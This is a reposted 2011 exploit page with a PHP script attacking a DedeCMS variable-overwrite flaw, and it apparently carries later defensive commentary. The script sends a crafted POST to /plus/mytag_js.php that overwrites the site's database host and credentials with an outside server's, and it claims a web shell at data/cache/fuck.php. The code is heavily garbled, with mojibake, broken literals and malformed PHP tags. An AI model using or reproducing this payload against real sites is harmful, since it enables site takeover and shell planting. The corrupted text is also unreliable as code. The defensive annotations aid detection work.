myhack58佚名MYHACK58:62201132125

Dedecms variable overwrite vulnerability exploit — vulnerability warning — the black bar safety net

2011-10-2400:00:00
佚名
www.myhack58.com

############################################################################

Title: Dedecms variable overwrite vulnerability exploit

Time: 2011-09-06

Team:MakeBug

Author: cfKing

############################################################################


/ |/ | / | | | / / | ____| | _ | | | | / ___| / ___/

/ /| /| | / /| | | |/ / | |__ | || | | | | | | | | |__

/ / |_/ | | / / | | | | | | | _ { | | | | | | _ \

/ / | | / / | | | | | |___ | || | | || | | |_| | ___| |

// || // || || \ || |/ \/ \/ /_____/

#! usr/bin/php-w

<? php

// Entry point of the writeup's proof-of-concept script: takes a hostname from
// argv[1], hands it to Getshell() (defined below), and decides "success" by
// looking for the text "OK" in the single response line Getshell() returns.
// Defensive reading: the only thing this script actually observes is the
// target's HTTP status line, so its "Exploit Success" output is not evidence
// that a file was written — do not treat that message alone as proof of
// compromise when triaging a copy of this tool.
error_reporting(E_ERROR);

set_time_limit(0);

// Banner only; no behaviour.
print_r(’

DEDEcms Variable Coverage

Exploit Author: [email protected]

);

echo “\r\n”;

// Usage text when no argument was given. Note that this branch does not exit:
// execution falls through to the assignment and the Getshell() call below with
// $argv[1] unset. The comparison is the loose `==` against null.
if($argv[1]==null){

print_r(’

±--------------------------------------------------------------------------+

Usage: php ‘.$ argv[0].’ url

Example:

php ‘.$ argv[0].’ www.site.com

±--------------------------------------------------------------------------+

');

}

$url=$argv[1];

// Getshell() returns only the first line fgets() reads from the socket — in
// practice the HTTP status line — so $exp never contains the response body.
$exp=Getshell($url);

// Success is inferred from "OK" appearing past a fixed offset in that status
// line (e.g. "HTTP/1.1 200 OK"); any 200 response from /plus/mytag_js.php
// therefore prints "Success". The shell path echoed below is asserted, never
// fetched or verified. (The numeric literal on this line is garbled in this
// copy of the page.)
if (strpos($exp,“OK”)>1 2){

echo “[*] Exploit Success \n”;

echo “[*] Shell:”.$ url.“/ data/cache/fuck. php\n” ;

}else{

echo “[*] Exploit Failed \n”;

}

// Builds one raw HTTP POST to /plus/mytag_js.php on the target host (port
// literal below) and returns the first line of the response.
//
// The request body on the $content line is the whole technique: the
// variable-overwrite flaw lets request parameters named
// _COOKIE[GLOBALS][cfg_*] replace the application's own database settings
// (cfg_dbhost, cfg_dbuser, cfg_dbpwd, cfg_dbname, cfg_dbprefix), so the site
// is redirected to an external database server named in the request.
//
// Notes for defenders reading this page:
//   - request parameters whose names alias a superglobal ("GLOBALS",
//     "_COOKIE[" …) or the application's cfg_* settings are never legitimate
//     for this software; a WAF/IDS rule on that shape against /plus/mytag_js.php
//     is a high-fidelity detection, and the server-side fix is to reject such
//     names wholesale rather than filter specific ones;
//   - the cfg_dbhost address hard-coded in $content comes from the original
//     2011 writeup — treat it as an indicator to hunt for in web and outbound
//     connection logs, not as a target;
//   - the garbled comment on the signature line ends in `=$ url;`, which looks
//     like an assignment (presumably `$host`) merged into the comment by the
//     page's encoding damage; the rest of the function reads $host — unconfirmed.
function Getshell($url){ //բ?? ܖؒ? ?? Β?ٗ? բ??? ӄóhell? Ďļ?=$ url;

// Port literal is garbled in this copy (contains a space).
$port=“8 0”;

// URL-encoded form body; see the header comment for what the _COOKIE[GLOBALS]
// keys do. doaction points back at the target's own mytag_js.php.
$content =“doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js. php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=Trojan&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=Trojan&COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede&nocache=true&QuickSearchBtn=%CC%E1%BD%BB”; //OK բ? Ťփ?

// Hand-built request line and headers (the User-Agent is a fixed string, which
// is itself a usable log signature for this particular tool).
$data = “POST /plus/mytag_js. php? aid=1 HTTP/1.1\r\n”; //IDֵ? ɒԸ?? ݿℚȝ? 仯

$data .= “Host: “.$ host.”\ r\n”;

$data .= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/2 0 1 0 0 1 0 1 For Firefox/5.0.1\r\n”;

$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n”;

$data .= “Accept-Language: EN-us,EN;q=0.5\r\n”;

//$data .= “Accept-Encoding: gzip,deflate\r\n”;

$data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”;

$data .= “Connection: keep-alive\r\n”;

$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;

$data .= “Content-Length: “. strlen($content).”\ r\n\r\n”;

$data .= $content.“\ r\n”;

// Plain TCP socket; no TLS, no timeout argument.
$ock=fsockopen($host,$port);

// A failed connection only prints a message — there is no return, so the
// fwrite() below still runs on a false handle.
if (!$ ock) {

echo “[*] No response from “.$ host.”\ n”;

}

fwrite($ock,$data);

// The `return` inside the loop fires on the first iteration, so exactly one
// line is read (the status line) and the socket is never closed — there is no
// fclose() in this function.
while (! feof($ock)) {

$exp=fgets($ock, 1 0 2 4);

return $exp;

}

}

?& gt;